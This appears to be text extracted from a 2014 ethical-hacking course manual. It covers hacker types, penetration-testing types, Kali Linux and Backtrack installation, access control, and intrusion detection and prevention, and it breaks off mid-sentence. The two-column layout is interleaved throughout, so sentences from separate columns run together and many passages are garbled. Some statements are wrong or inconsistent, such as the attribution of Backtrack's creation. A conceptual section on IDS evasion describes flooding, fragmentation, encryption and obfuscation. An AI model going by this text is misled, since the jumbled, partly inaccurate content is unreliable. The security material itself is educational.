Ethical Hacking

www.iqspl.
com |1
Network Security Module-II (2014) 5 Malware 95-112
Trojan & Backdoor
Subject Name Ethical Hacking Viruses & Worms
Spyware
Adware
Instruction hours: 24 Hours Ransomware
Bots
Practical duration: 24 Hours Botnets
Bombs
Unit no. Topics & Contents Page
No. 6 Various Attack Methods & 113-179
their Countermeasures-I
1 Introduction to Ethical Hacking 5-11 Denial of Service
Ethical Hacking Definition Session Hijacking
Types of Hacker MITM Active & Passive
Hacking Vs. Ethical Hacking Web-Server Hacking
Essential Hacking Terminologies SQL Injection
Hacking Wireless Network
2 Introduction to Backtrack & Kali 12-30 Wireless Network Architecture
Installation & Live booting Basic configuration
Basic Commands & Concepts Protocols & functioning
File System & Directories Evading IDS, Firewall & Honey pots
Configuring Backtrack
Installing application on Backtrack 7 Various Attack Methods & 180-233
Updating Backtrack their Countermeasures-II
Sniffing with Backtrack Buffer Overflow
Running Windows application on Backtrack Cross Site Scripting
Sniffer
3 Access Control, Firewallsand 31-54 Password Attack
Intrusion Detection E-mail Attack
Overview of Identification and Authentication Social Engineering
Authorization and accountability.
Intrusion Detection Systems and Intrusion Prevention Systems 8 Mobile Security 234-257
User Management Mobile Attack
DNS Routing and Load Balancing Vulnerabilities & Risks
DMZ and firewall features Mobile Device Management
Mobile Protection Tool
4 Ethical Hacking Steps 55-94
Foot-Printing & Reconnaissance 9 Penetration Testing Methodologies 258-269
Scanning Security Assessment
Enumeration Vulnerability Assessment
System Hacking Penetration Testing
Maintaining Access Types of Penetration Testing
Covering Tracks Common Penetration Testing Techniques

2| www.iqspl.com www.iqspl.com |3
10 Cryptography 270-291 Chapter 1.
Introduction to Cryptography
Symmetric key Cryptography Introduction to Ethical Hacking
Asymmetric key Cryptography
Message Authentication and Hash
Digital Signatures Objectives
Public Key infrastructure
Diffe-Hellman key exchange protocol Ethical Hacking Definition
Applications of Cryptography
Types of Hacker
Steganography
Hacking Vs. Ethical Hacking
11 Cybercrime and Indian Cyber Law 292-337 Essential Hacking Terminologies
IT Act
IPC Section
Case Studies
Introduction:
Although Ethical is an often overused and misunderstood word, in network
security context it means working with high professional morals and princi-
ples. Hacking is an act of penetrating computer systems to gain knowledge
about the system and how it works. Hacking is the gaining of access (wanted
or unwanted) to a computer and viewing, copying, or creating data (leaving
a trace) without the intention of destroying data or maliciously harming the
computer.Hacking and hackers are commonly mistaken to be the bad guys
most of the time.
1.1 Ethical Hacking Definition
Ethical Hacking andethical hackerare terms used to describehackingper-

formed by a company or individual to help identify potential threats on a com-
puter or network. An ethical hacker attempts to bypass system security and
search for any weak points that could be exploited by malicious hackers. This
information is then used by the organization to improve the system security,
in an effort to minimize or eliminate any potential attacks. To catch a thief,
you must think like a thief. Thats the basis for ethical hacking. Knowing your
enemy is absolutely critical.
1.2 Types of Hackers
Hackers can be divided into three groups:

White Hats: Good guys, ethical hackers
Black Hats: Bad guys, malicious hackers
Grey Hats: Good or bad hacker; depends on the situation
Ethical hackers usually fall into the white-hat category, but sometimes theyre 1.3 Ethical Vs. Unethical Hacking
former grey hats who have become security professionals and who now use
their skills in an ethical manner. Many of us tend to be confused between the concepts ofEthical and Uneth-
ical Hacking. To us, hacking is itself, automatically called as unethical or
White Hats illegal. Normally, hacking can be defined as unauthorized breach of barriers
put for the protection of important data, information and people as well.
White hats are the ethical hackers who use their hacking skills for defensive
purposes. White-hat hackers are usually security professionals with knowl- Initially hacking was all about breaking laws and accessing unauthorized in-
edge of hacking and who use this knowledge to locate weaknesses and im-
formation by certain groups of people, specializing in Information Technology
plement countermeasures. White hats hack with permission from the data
owner. It is critical to get permission prior to beginning any hacking activity. and Computer Programming. Some of the major computer companies such as
Apple, IBM and Microsoft comprises of large team of dedicated, talented and
professional hackers. These hackers, however are not breaking the laws, so
Black Hats far nobody can tell. For ethical hackers, their job includes to test the newly
Black hats are the malicious hackers or crackers who use their skills for developed program to find loopholes in security system of the program.
illegal or malicious purposes. They break into remote systems, with mali-
cious intent. Having gained unauthorized access, black-hat hackers destroy In simple words, an ethical hacker is a computer expert, who attacks a high-
vital data; deny legitimate users service, and cause problems for their targets. ly protected security system on behalf of his owner with care and prevents
Black-hat hackers and crackers can easily be differentiated from white-hat the exploitation of the program that an unethical hacker might cause harm.
hackers because their actions are malicious.
In order to test the program, ethical hacker makes use of the same methods
as unethical hackers to create malicious attack on the security system. On
Grey Hats the other hand, an unethical hacker is more of a vigilante, who is basically
Grey hats are hackers who may work offensively or defensively, depending on involved in exploiting security vulnerabilities for some hacktivists or person
the situation. This is the dividing line between hacker and cracker. Grey-hat who wants to get unauthorized access to the system.
hackers may just be interested in hacking tools and technologies and are not
malicious black hats. Grey hats are interested in hacker tools mostly from a The technical differences between Ethical and Unethical Hacking is ZERO,
curiosity standpoint. They may want to highlight security problems in a sys- but what counts here is Moral difference, which is substantive. At present,
tem or educate victims so they secure their systems properly. These hackers most of the companies have their own hackers. Both the hackers seems to do
are doing their victims a favour. The difference between white hats and grey
well in their business, depends on who hires them. It can be well termed as
hats is that permission word. Although grey hats might have good intentions,
without the correct permission they can no longer be considered ethical. the fight between Police Force and Criminals.
Skills needed by an Ethical Hacker

Testing Types
An ethical hacker must have a variety of in-depth computer skills to conduct
business successfully. Because not everyone can be an expert in all the re- When performing a security test or penetration test, an ethical hacker utilizes
quired fields, ethical hacking might be conducted by teams whose members one or more types of testing on the system. Each type simulates an attacker
skills complement each other. Organizations have a variety of computer sys-
with different levels of knowledge about the target organization. These types
tems that have to probed, so the team must have expertise in a variety of
operating systems such as Unix, Windows, Linux, and Macintosh. They must are as follows:
also b e familiar with the different hardware platforms and networks that they
might encounter, as well as be knowledgeable in the fundamental principles
of information system security.
Black Box Risk: The potential for harm or loss to an information system or net-
work; the probability that a threat will materialize
Black-box testing involves performing a security evaluation and testing with
Attack: An action against an information system or network that at-
no prior knowledge of the network infrastructure or system to be tested. Test- tempts to violate the system security policy; usually the result of a
ing simulates an attack by a malicious hacker outside the organizations se- threat realized.
curity perimeter. Black-box testing can take the longest amount of time and
Target of Evaluation: An IT product, element, or system designated to
most effort as no information is given to the testing team. Therefore, the infor- have a security evaluation.
mation-gathering, reconnaissance, and scanning phases will take a great deal
Exploit: It means of exploiting a weakness or vulnerability in an IT
of time. The advantage of this type of testing is that it most closely simulates system to violate the systems security.
a real malicious attackers methods and results. The disadvantages are pri-
marily the amount of time and consequently additional cost incurred by the
testing team. Hackers, Crackers, and Other Related Terms
Originally, the term hacker did not have negative connotation. A hacker was
White Box a computer person who was intellectually curious and wanted to learn as
much as possible about computer systems. A person who was hacking was
White-box testing involves performing a security evaluation and testing with
developing and improving software to increase the performance of computing
complete knowledge of the network infrastructure such as a network admin- systems.
istrator would have. This testing is much faster than the other two methods
A cracker was an individual using his or her capabilities for harmful pur-
as the ethical hacker can jump right to the attack phase, thus bypassing poses against computer systems. Another name for a cracker is a malicious
all the information-gathering, reconnaissance, and scanning phases. Many hacker.
security audits consist of white-box testing to avoid the additional time and Over time, the terms hacker and cracker both took on the definition of an
expense of black-box testing. individual who used offensive skills to attack computer systems. Therefore,
an ethical hacker is a security professional who uses his or her computing
Grey Box capabilities for defensive purposes and to increase the security posture of in-
formation systems.
Grey-box testing involves performing a security evaluation and testing inter-
A phreaker is a hacker who focuses on communication systems to steal call-
nally. Testing examines the extent of access by insiders within the network.
ing card numbers, make free phone calls, attack PBXs and acquire access,
The purpose of this test is to simulate the most common form of attack, those illegally, to communication devices.
that are initiated from within the network. The idea is to test or audit the level
A whacker is a novice hacker who attacks Wide Area Networks (WANs) and
of access given to employees or contractors and see if those privileges can be wireless networks.
escalated to a higher level.
A script/kiddie is usually a young individual without programming skills
who uses attack software that is freely available on the Internet and from
1.4 Essential Ethical Hacking Terminologies other sources.
The cyber-terrorist is an individual who works for a government or terrorist
group that is engaged in sabotage, espionage, financial theft, and attacks on
Threat: An event or activity that has the potential to cause harm to the a nations critical infrastructure.
information systems or networks
Vulnerability: A weakness or lack of a safeguard that can be exploited
by a threat, causing harm to the information systems or networks; can
exist in hardware, operating systems, firmware, applications, and con-
figuration files
Hactivism
Hackers and crackers have a variety of motivations and justifications for their Hacking Mobile Handset Statistics 2014
activities. Some of these individuals believe that information should be free
and they are doing their part in this cause. Hackers who conduct their activi-
ties for a cause are said to be practicing hactivism. Thus, their targets are any
organizations that they perceive are behind social injustice. They attack gov-
ernment organizations and agencies, international economic organizations
and any other entities that they define as being responsible for social and
economic inequities. Through their hactivism, they gain publicity for their
cause and for themselves to help build their reputation. No matter what the
justification, breaking into computers and networks is illegal.
These hackers usually have a social or political agenda. Their intent is to
send a message through their hacking activity while gaining visibility for their
cause and themselves. Many of these hackers participate in activities such as
defacing websites, creating viruses and implementing DoS or other disrup-
tive attacks to gain notoriety for their cause. Hacktivism commonly targets
government agencies, political groups, and any other entities these groups or
individuals perceive as bad or wrong.
Statistics
Statistics of various attacks on Internet in 2014
10 | www.iqspl.com www.iqspl.com | 11
Chapter 2 Custom kernel, patched for injection: As penetration testers, the
development team often needs to do wireless assessments; so the ker-
nel has the latest injection patches included.
Kali Linux & Backtrack
Developed in a secure environment:The Kali Linux team is made up
of a small group of individuals who are the only ones trusted tocommit
packages and interact with the repositories, all of which is done using
About Kali Linux: multiple secure protocols.
Kali Linux is an open source project that is maintained and funded by Of-
GPG signed packages and repositories:Every package in Kali Linux
fensive Security, a provider of world-class information security training and
issigned by each individual developer whobuilt and committed it and
penetration testing services.In addition to Kali Linux, Offensive Security also the repositories subsequently sign the packages as well.
maintains theExploit Databaseand the free online courses.
Multi-language support:Although penetration tools tend to be written
Kali Linuxis a Debian-based Linux distribution aimed at advanced Penetra-
in English, Kali includestrue multilingual support, allowing more users
tion Testing and Security Auditing. Kali contains several hundred tools aimed to operate in their native language and locate the tools they need for the
at various information security tasks, such asPenetration Testing, Forensics job.
and Reverse Engineering.
Completely customizable: Not everyone will agree with design deci-
Kali Linux was released on the 13th March 2013 as a complete, top-to bot-
sions, so it was made as simple as possible for more adventurous users
tomrebuild of Backtrack Linux, adhering completely ofDebiandevelopment tocustomize Kali Linuxto their liking, all the way down to the kernel.
standards.
ARMEL and ARMHF support:Since ARM-based single-board systems
like the Raspberry Pi and Beagle-Bone Black, among others, are becoming
Features: more and more prevalent and inexpensive; Kalis ARM supportwould
need to be robust, with fullyworking installations for bothARMEL and
More than 600 penetration testing tools included: After reviewing ARMHF systems. Kali Linux is available ona wide range of ARM devic-
every tool that was included in Backtrack, we eliminated a great num- esand has ARM repositories integrated with the mainline distribution
ber of tools that either simply did not work or which duplicatedother so tools for ARM areupdated in conjunction with the rest of the distri-
tools that provided the same or similar functionality. Details on whats bution.
included are on theKali Toolssite.
Free and always will be:Kali Linux, like Backtrack, is completely free of
charge and always will be. You will never, ever have to pay for Kali Linux.
Open source GIT tree: Developers of Kali Linux are committed to
the open source development model and their development tree is
available for all to see. All of the sourcecodethat goes into Kali Linux
isavailable for anyonewho wantsto tweak orrebuild packages to suit
their specific needs.
FHS compliant:Kali adheres to theFile system Hierarchy Standard,
allowing Linux users to easily locate binaries, support files, libraries,
etc.
Wide-rangingwireless device support:A regular sticking point with
Linux distributions has been support for wireless interfaces. Kali Linux
is built to support as many wireless devices as possibly can, allowing it
to run properly on a wide variety of hardware and making it compatible
with numerous USB and other wireless devices.
Kali Linux Core Developers: Kali 1.0.2 27th March 2013 MinorBugfixRelease and update roll-
up.
MatiAharoni (muts)
Kali 1.0.1 14th March 2013 MinorBugfixRelease.
DevonKearns (dookie)
Kali 1.0.0 13th March 2013 Initial release.
RaphaelHertzog (buxy)
Kali Linux Installation:

Download Link:
Installing Kali Linux on your computer is an easy process. First, youll need
https://www.kali.org
compatible computer hardware. Kali is supported on i386, amd64, and ARM
https://forum.kali.org (both armel and armhf) platforms. The hardware requirements are minimal
as listed below, although better hardware will naturally provide better perfor-
https://tools.kali.org mance. The i386 images have a defaultPAEkernel, so you can run them on
systems with over 4GB of RAM.Download Kali Linuxand either burn the ISO
to DVD, orprepare a USB stick with Kali Linux Liveas the installation medium.
Kali Linux Release History:
Installation Prerequisites:
Fresh images of Kali Linux are released every few months as a result of accu-
mulative fixes, major security updates, installer updates, etc. The following is A minimum of 10 GB disk space for the Kali Linux install.
a record of the current available releases: For i386 and amd64 architectures, a minimum of 1 GB RAM.
Kali 2.0 11th August 2015 Major release, now a rolling distribution,
CD-DVD Drive / USB boot support
major UI changes. Codename SANA
Kali 1.1.0a 13th March 2015 No fanfare release fixing kernel ABI
inconsistencies in the installers. Preparing for the Installation:
Kali 1.1.0 9th February 2015 First dot releasein 2 years. New ker- Download Kali Linux from https://www.kali.org
nel, new tools and updates. Codename MOTO
Burn the Kali Linux ISO to DVD or Image Kali Linux Live to USB.
Kali 1.0.9a 6th October 2014 Security BugFix Release cover-
ingshellshockand Debianaptvulnerabilities. Ensure that your computer is set to boot from CD / USB in your BIOS.
Kali 1.0.9 25th August 2014 BugFix Releaseincluding installer and

a set oftool updatesand package fixes.
Kali 1.0.8 22nd July 2014 EFI Support for full ISOs and a set
oftool updatesand package fixes.
Kali 1.0.7 27th May 2014 Kernel 3.14,tool updates, and package
fixes,Kali Live Encrypted USB Persistence.
Kali 1.0.6 9th January 2014 Kernel 3.12, cryptsetup nuke option,
Amazon AMI, ARM build Scripts.
Kali 1.0.5 5th September 2013 Bugfix rollup.LVM Encrypted in-
stalls Software Defined Radio (SDR) tools.
Kali 1.0.4 25th July 2013 Bugfix rollup. Penetration testing tool
additions and updates.
Kali 1.0.3 26th April 2013 Bugfix rollup.New accessibility features.
Added live Desktop installer.
Kali Linux Installation Procedure: 3. Specify your geographic location.
1. To start your installation, boot with your chosen installation medium.

You should be greeted with the Kali Boot screen. Choose eitherGraphi-
calorText-Modeinstall. In this example, we chose a GUI install.
4. The installer will copy the image to your hard disk, probe your network
interfaces, and then prompt you to enter a hostname for your system.
In the example below, weve entered kali as our hostname.
2. Select your preferred language and then your country location. Youll
also be prompted to configure your keyboard with the appropriate key
map.
5. You may optionally provide a default domain name for this system to 7. The installer will now probe your disks and offer you four choices. In
use. our example, were using the entire disk on our computer and not con-
figuring LVM (logical volume manager). Experienced users can use the
Manual partitioning method for more granular configuration options.
Note: Itll wipe all the data from your HDD.
6. Next, set your time zone. 8. Select the disk to be partitioned.
9. Depending on your needs, you can choose to keep all your files in a 11. Configure network mirrors. Kali uses a central repository to distribute
single partition the default or to have separate partitions for one or applications. Youll need to enter any appropriate proxy information as
more of the top-level directories. If youre not sure which you want, se- needed.
lect All files in one partition.
10. Next, youll have one last chance to review your disk configuration be-
12. Next, install GRUB.
fore the installer makes irreversible changes. After you clickContinue,
the installer will go to work and youll have an almost finished instal-
lation.
13. Finally, click Continue to reboot into your new Kali installation. Lab Objective:
Installation of Backtrack 5
LAB TASK:
Step - 1 Download the Backtrack 5 ISO from below link
http://www.backtrack-linux.org/downloads/
Step - 2 Installing Backtrack 5

If you are installing on a hard drive, you will need to burn the Backtrack 5
ISO on to a DVD or a USB Drive. First turn on your machine and then insert
your DVD or USB Drive. Then press the key that allows you to select your
boot drive. You may have to go into the bios to enable this. Most often, F12
will work. Select either your DVD drive or your USB Drive to boot from it. You
should see a screen like this:
Note: After clicking on Continue, itll restart and boot your installed Kali
Linux.
Overview of Backtrack:
Backtrack is a distribution designed by Jason Dennis based on the Ubuntu
Linux distribution aimed at digital forensics and penetration testing use. It
was named after backtracking; a search algorithm First release was 2007.
The evolution of Backtrack spans many years of development, penetra-
tion tests, and unprecedented help from the security community.
Backtrack originally started with earlier versions of live Linux distribu- Step 3 After a few moments, you will see Backtrack Live CD menu.
tions called Whoppix, WHAX, and Auditor. Press enter on Backtrack Text Default Boot Text Mode.
When Backtrack was developed, it was designed to be an all in one live
cd used on security audits and was specifically crafted to not leave any
remnants of itself on the laptop.
It has since expanded to being the most widely adopted penetration-test-
ing framework in existence and is used by the security community all
over the world.
Step 5 Installation Screen is loading.
Step 4 Wait about 10 seconds and you will come to Backtrack login con-
sole. Type the command startx to load the GUI. Step 6 After another few moments, you will come to the desktop of Back-
track. Double click on the Install Backtrack to begin the install process.
Step 7 Now select your language and time zone and click on forward but- Step 8 Select Keyboard layout and click on forward button.
ton.
Step 9 This step is important as you have to partition your drive. If you are
using a virtual machine, go ahead and use the whole drive. If you are dual
booting, you will have to specify your partition for your two operating systems.
Step 9 Continue through the installer, and then click Install. Backtrack will Step 11 Backtrack 5 Login
then install on to your system. This process takes about 10-15 minutes.
After restarting, you will come to a login screen like this. The default root
name for Backtrack is root and the password is root. After typing in the
root username and password, you will come back to the Backtrack shell.
Step 12 Type startx to enter the GUI desktop.
Step 10 After it is finished, restart your system.
CHAPTER 3
Access Control, Firewallsand
Intrusion Detection
Objective
3.1 Overview of Identification and Authentication
3.2 Authorization and Accountability
3.3 Intrusion Detection Systems
3.4 Intrusion Prevention Systems
3.5 User Management
3.6 DNS Routing and Load Balancing
3.1 Overview of Identification and Authentication Access Control

Access control is a way of limiting access to a system or to physical or virtu-
al resources. In computing, access control is a process by which users are
granted access and certain privileges to systems, resources or information.
In access control systems, users must present credentials before they can
be granted access. In physical systems, these credentials may come in many
forms, but credentials that cant be transferred provide the most security.
For example, a key card may act as an access control and grant the bear-
er access to a classified area. Because this credential can be trans-
ferred or even stolen, it is not a secure way of handling access control.
A more secure method for access control involves two-factor authentication. The
person who desires access must show credentials and a second factor to corroborate
identity. The second factor could be an access code, a PIN or even a biometric reading.
There are three factors that can be used for authentication:
Something only known to the user, such as a password or PIN
Something that is part of the user, such as a fingerprint, retina scan or

another biometric measurement
Something that belongs to the user, such as a card or a key
Identification
Identification is nothing more than claiming youre somebody. You identify
yourself when you speak to someone on the phone that you dont know and
they ask you who theyre speaking to. When you say, Im Alok. youve just
identified yourself.
In the information security world, this is analogous to entering a username.
Itsnotanalogous to entering a password. Entering a password is a method
for verifying that you are whom you identified yourself as and thats the next
one on our list.
3.2 Authorization and accountability
For computer security, access control includes the authorization, authentica-

tion and audit of the entity trying to gain access. Access control models have Authentication
a subject and an object.
Authentication is how one proves that they are who they say they are. When
The subject - the human user - is the one trying to gain access to the object
you claim to be Alok by logging into a computer system as Alok, its most
- usually the software. In computer systems, an access control list contains
likely going to ask you for a password. Youve claimed to be that person by
a list of permissions and the users to whom these permissions apply. Such
entering the name into the username field (thats the identification part), but
data can be viewed by certain people and not by other people and is controlled
now you have to prove that you are really that person. Most systems use a
by access control. This allows an administrator to secure information and set password for this, which is based on something you know, i.e. a secret be-
privileges as to what information can be accessed, who can access it and at tween you and the system.
what time it can be accessed.
Its interesting to note that following three steps take place every day in a very Another form of authentication is presenting something youhave, such as a
transparent fashion. When your boss calls you at work and asks to meet you drivers license, an RSA token, or a smart card. You can also authenticate via
across town for lunch, two things happen instantly usually at the exact something youare. This is the foundation for biometrics. When you do this,
same time: just by hearing the bosss voice you have both identified and au- you first identify yourself and then submit a thumbprint, a retina scan, or
thenticated them. Identification doesnt have to be done by the person being another form of bio-based authentication.
identified; the person doing the identifying as well can do it. Once youve successfully authenticated, you have now done two things: youve
Another interesting hybrid is trying to get into a nightclub. When you get to claimed to be someone, and youve proven that you are that person. The only
the door and present your I.D., youre not just claiming you are that person, thing thats left is for the system to determine what youre allowed to do.
but youre presenting the I.D. as proof thats both steps in one. The result
of whether or not your authentication was accepted as authentic is what de-
termines whether or not you will be given authorization to get into the club. Authorization
Adding a bit of authorization to that analogy, it may be a club where youre al- Authorization is what takes place after a person has been both identified and
lowed to get in once you prove who you are, but you only get a wrist band that authenticated; its the step determines what a person can then do on the system.
allows you to consume alcohol if youre over 21. Otherwise youre not allowed An example in people terms would be someone knocking on your door at
to. This would beauthorizationbecause its assigning you privileges based on night. You say, Who is it? and wait for a response. They say, Its Sandeep.
some attribute of your identity. In order to identify them, you ask them to back up into the light so you can
see them through the peephole. They do so and you authenticate them based
on what they look like (biometric). At that point you decide they can come in-
side the house.
If they had said they were someone you didnt want in your house (identifica-
tion), and you then verified that it was that person (authentication), the au-
thorization phase would not include access to the inside of the house.
Accountability There are two main types of systems in which IDS can be used: Network, Host
and Log File Monitoring.
It is the property that ensures that the actions of an entity can be traced solely
to this entity.Accountabilityguarantees that all operations carried out by in-
dividuals, systems or processes can be identified (identification) and that the
trace to the author and the operation is kept (traceability). NIDS:
Network Intrusion Detection Systems are placed at a strategic point or
points within the network to monitor traffic to and from all devices on
3.3 Intrusion Detection Systems (IDS) the network. Ideally you would scan all inbound and outbound traffic;
however doing so might create a bottleneck that would impair the over-
all speed of the network.
In a network-based intrusion-detection system (NIDS), the sensors are
located at choke points in network to be monitored, often in the de-
militarized zone (DMZ) or at network borders. The sensor captures all
network traffic and analyzes the content of individual packets for mali-
cious traffic.
HIDS:
Host Intrusion Detection Systems are run on individual hosts or devic-
es on the network. A HIDS monitors the inbound and outbound packets
from the device only and will alert the user or administrator of suspi-
cious activity as detected.
How does IDS work?

To understand how IDS works, we need to know the three main components,
which built up the IDS. The three main components are sensor, backend and
An intrusion detection system (IDS) inspects all inbound and outbound net- frontend. These three components will be explained in terms of the functions
work activity and identifies suspicious patterns that may indicate a network as follows:
or system attack from someone attempting to break into or compromise a
system.
An IDS is also referred as packet-sniffer, which intercepts packets travelling (1) Sensor
along various communication mediums and protocols, usually TCP/IP. Sensor works as a packet capture and activity capture engine. It determines
the presence of an event by comparing the events captured with the events
in the signature database. This technique is known as pattern matching. The
Types of IDS IDS looks for traffics and behavior that match the pattern of known attacks
in the signature database. Thus, the database must be kept up-to-date. The
IDS come in a variety of flavors and approach the goal of detecting
sensors only focus is on detection. In the case of network-based IDS, the
suspicious traffic in different ways. There are network based (NIDS) and
sensor will tap into the network and listen to the various communications
host based (HIDS) intrusion detection systems. There are IDS that de-
within its reach. When the sensor finds an event that matches the event in
tect based on looking for specific signatures of known threats - similar
the signature database, it will report the detection to the backend.
to the way antivirus software typically detects and protects against mal-
ware and there are IDS that detect based on comparing traffic patterns
against a baseline and looking for anomalies.
(2) Backend
The backend plays the role of an alarm. It is the core of the IDS where it de-
termines how an event reported by the sensor is handled. The backend will
collect all events detected by the sensors and keep the events record in an Services: Service configuration files are routinely checked to ensure that the
event repository database. It will then alert the users if there are any threat- there are no unauthorized services in operation on the network.
ening events found. The IDSs users can configure the way the IDS respond.
Usually, alert can come in the form of log, email or screen display. Backend Packet Sniffing: Intrusion detection systems check for unauthorized net-
also provide IDS setup and configuration storage. work monitoring programs that may have been installed for the purpose of
monitoring and recording user account data activity.
PC Check: The intrusion detection system will check each PC on the network
(3) Frontend periodically to make sure there have not been any violations or tampering ac-
tivity. Generally, if one PC displays a violation, the system should check all of
Since backend plays it role to collect events captured by the sensor, frontend the other machines on the network.
will display/view the events collected. It is a direct user interface that allows
the user to command and control the IDS. From the frontend, the user can
view the events detected by the sensor, setup and configure IDS and update
the signature database. IDS Evasion Techniques
Intrusion detection system evasion techniques bypass detection by creating
different states on the IDS and on the targeted computer.
Ways to Detect an Intrusion The adversary accomplishes this by manipulating either the attack itself or
the network traffic that contains the attack.
All Intrusion Detection Systems use the following detection techniques:
These evasive techniques include flooding, fragmentation, encryption, and
Statistical anomaly based IDS: A statistical anomaly-based IDS establish- obfuscation.
es a performance baseline based on normal network traffic evaluations. It
will then sample current network traffic activity to this baseline in order to Flooding: IDSs depend on resources such as memory and processor power
detect whether or not it is within the baseline parameters. If the sampled to effectively capture packets, analyze traffic and report malicious attacks.
traffic is outside baseline parameters, an alarm will be triggered. By flooding a network with noise traffic, an attacker can cause the IDS to
exhaust its resources examining harmless traffic. In the meantime, while the
Signature-Recognition- Network traffic is examined for preconfigured and
IDS is distracted and occupied by the volume of noise traffic, the attacker can
predetermined attack patterns known as signatures. Many attacks today
target its system with little or no intervention from the IDS.
have distinct signatures. In good security practice, the collection of these
signatures must be constantly updated to mitigate emerging threats. A denial of service (DOS): attack is one that is intended to compromise
the availability of a computing resource. Common DOS attacks include ping
Protocol Anomaly Detection- In this type of Detection, model is built on floods and mail bombs, both intended to consume disproportionate amounts
TCP/IP protocols using their specification. of resources, starving legitimate processes. Other attacks are targeted at bugs
in software, and are intended to crash the system.
An IDS works by examining the following events: Denial of service attacks can be leveraged to subvert systems as well as to
disable them. When discussing the relevance of DOS attacks to a security
Observing Activity: The intrusion detection system will observe the activity system, the question of whether the system is ``fail-open arises. A ``fail-open
that taking place within the network and keep track of user policies and activ- system ceases to provide protection when it is disabled by a DOS attack. A
ity patterns to ensure there are no attempts to violate these patterns. ``fail-closed system, on the other hand, leaves the network protected when it
Viruses: Virus and malware can hide within a network system in the form of is forcibly disabled.
spyware, keylogging, password theft and other types of malicious attacks. A The terms ``fail-open and ``fail-closed are most often heard within the con-
good intrusion detection system can spot where they are hiding and then take text of firewalls, which are access-control devices for networks. A fail-open
the necessary steps to remove these hidden files. firewall stops controlling access to the network when it crashes, but leaves
File Settings: Authorization files on a network generally consist of a user the network available. An attacker that can crash a fail-open firewall can by-
authorization and a group authorization. The intrusion detection system will pass it entirely. Good firewalls are designed to ``fail-closed, leaving the net-
check these on a regular basis to ensure they have not been tampered with work completely inaccessible (and thus protected) if they crash.
in any way. Network ID systems are passive. They do not control the network or maintain
its connectivity in any way. As such, a network IDS is inherently fail-open.
If an attacker can crash the IDS or starve it of resources, she can attack the In the computer defence systems arena, firewalls and anti-virus protection
rest of the network as if the IDS werent even there. Because of the obvious are not enough. You need more proactive, intuitive, and pre-emptive comput-
susceptibility to DOS attacks that network ID systems have, its important er defence technology with the capability to detect and prevent, or block, an
that they be fortified against them. attack in real time. One such technology is the intrusion prevention system
(IPS) or intrusion detection and prevention system.
Fragmentation: Because different network media allow variable maximum
transmission units (MTUs), you must allow for the fragmentation of these trans- An IPS is a pre-emptive network security approach that uses advanced tech-
mission units into differently sized packets or cells. Hackers can take advantage niques to detect and block (or prevent) possible intrusion attempts into a
of this fragmentation by dividing attacking packets into smaller and smaller por- computer system. An IPS thoroughly scans the traffic flowing to and from
tions that evade the IDS but cause an attack when reassembled by a target host. a computer system or computer network for security breaches. If a threat
is detected, the system is able to take defensive actions such as dropping a
Protocols like TCP allow any amount of data (within the limits of the IP pro-
particular data packet or dropping the whole connection. The scan captures
tocols maximum packet size) to be contained in each discrete packet. A col-
details, the action report is logged in a file, and an alert is sent to the system
lection of data can be transmitted in one packet, or in a group of them. Be-
or network administrator.
cause they can arrive at their destination out of order, even when transmitted
in order, each packet is given a number that indicates its place within the An Intrusion Prevention System (IPS) is a network security/threat preven-
intended order of the stream. This is commonly referred to as a `sequence tion technology that examines network traffic flows to detect and prevent
number, and we call collections of packets marked with sequence numbers vulnerability exploits. Vulnerability exploits usually come in the form of mali-
sequenced. cious inputs to a target application or service that attackers use to interrupt
and gain control of an application or machine. Following a successful exploit,
Encryption: Network-based intrusion detection (covered later in this chapter)
the attacker can disable the target application (resulting in a denial-of-service
relies on the analysis of traffic that is captured as it traverses the network
state), or can potentially access to all the rights and permissions available to
from a source to its destination. If a hacker can establish an encrypted ses-
the compromised application.
sion with its target host using Secure Shell (SSH), Secure Socket Layer (SSL),
or a virtual private network (VPN), the IDS cannot analyze the packets and the An IPS is used in computer security. It provides policies and rules for net-
malicious traffic will be allowed to pass. Obviously, this technique requires work traffic along with an intrusion detection system for alerting system or
that the attacker establish a secure encrypted session with its target host. network administrators to suspicious traffic, but allows the administrator to
provide the action upon being alerted. Some compare an IPS to a combination
Obfuscation: Obfuscation, an increasingly popular evasive technique, in-
ofIDSand an application layer firewall for protection.
volves concealing an attack with special characters. It can use control charac-
ters such as the space, tab, backspace, and Delete. Also, the technique might An Intrusion Prevention System is a network device/software that goes deep-
represent characters in hex format to elude the IDS. Using Unicode represen- er than a firewall to identify and block network threats by assessing each
tation, where each character has a unique value regardless of the platform, packet based on the network protocols in the application layer, the context of
program, or language, is also an effective way to evade IDSs. the communication and tracking of each session.
Polymorphic code is another means to circumvent signature-based IDS by
creating unique attack patterns, so that the attack does not have a single de-
Prevention Techniques
tectable signature.
The IPS often sits directly behind the firewall and of provides a complemen-
tary layer of analysis that negatively selects for dangerous content. Unlike its
3.4 Intrusion Prevention Systems predecessor theIntrusion Detection System(IDS), which is a passive system
that scans traffic and reports back on threats the IPS, is placed in line, active-
Cyber security is a heated discussion topic in the IT world today. With the
ly analysing and taking automated actions on all traffic flows that enter the
exponential increase in cyber crime, individuals as well as corporations are
network. Specifically, these actions include:
feeling the heat of computer security breaches. Cyber criminals are targeting
even state governments successfully. Extensive cyber crime creates doubt Sending an alarm to the administrator (as would be seen in an IDS)
about the computer defence systems in place today. Although no security
mechanism can guarantee 100-percent protection against malicious comput- Dropping the malicious packets
er intrusions, deploying the best possible defence systems makes it difficult Blocking traffic from the source address
for cyber intruders to enter computer systems and cause damage.
Resetting the connection
As an inline security component, the IPS must work efficiently to avoid de- Consider a hypothetical situation in which an unsuccessful attempts to log
grading network performance. It must also work fast because exploits can in to a server generates a Login Failed response to a user. This response is
happen in near real-time. The IPS must also detect and respond accurately, normal if users forget their login credentials or enter the wrong credentials,
so as to eliminate threats and false positives (legitimate packets misread as but a repetitive login failure could signal a possible intrusion attempt. If there
threats). were a rule in the IPS that scans the outgoing packets for the signature Login
failed, after a legitimate number of login retries, an alert would be generated
to the system or network administrator.
Detection Techniques Another example involves the usernames and passwords used in repetitive
The IPS has a number of detection methods for finding exploits, but signa- login attempts. If an IPS is configured to match usernames and passwords
ture-based detection and statistical anomaly-based detection are the two with the list of usernames and passwords collected from known attacks, then
dominant mechanisms. this type of signature match can also trigger an alert.
If a match is found, preventive action is taken and an alert is generated. This
step ensures that known cyber attacks or intrusion attempt patterns do not
Signature-based detection is based on a dictionary of uniquely identifiable cause damage to the computer system. Following are some examples of sig-
patterns (or signatures) in the code of each exploit. Whenever an exploit is dis- nature matching:
